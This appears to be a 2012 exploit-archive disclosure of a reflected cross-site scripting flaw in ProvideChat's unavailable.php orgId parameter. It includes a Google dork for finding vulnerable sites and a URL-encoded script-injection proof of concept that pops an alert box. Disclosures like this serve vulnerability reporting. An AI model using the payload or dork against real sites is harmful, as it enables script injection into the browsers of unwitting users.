ProvideChat suffers from a cross site scripting vulnerability.
560eb03b5be80d8267f94b5b511f7b59bcc3b0bcb60d480f28fbe927d7798e23
# Exploit Title: ProvideChat Cross Site Scripting
# Date: 15.03.2012
# Author: Sony
# Software Link: http://providechat.com
# Google Dorks: inurl:/_chat/unavailable.php?orgId= or intext:powered by
providechat
# Web Browser : Mozilla Firefox
# Site : http://insecurity.ro
# PoC:
http://st2tea.blogspot.com/2012/03/providechat-cross-site-scripting.html
..................................................................
http://providechat.com/_chat/unavailable.php?orgId=3110&option=offline
http://providechat.com/_chat/unavailable.php?orgId=[our xss is here]
http://providechat.com/_chat/unavailable.php?orgId=%22%22%3E%3Cscript%3Ealert%28%22123%22%29%3C/script%3E
http://1.bp.blogspot.com/-6qnvzsHKC-0/T2IWOfIHFyI/AAAAAAAAAvw/biC_DdjgU84/s1600/providexss.JPG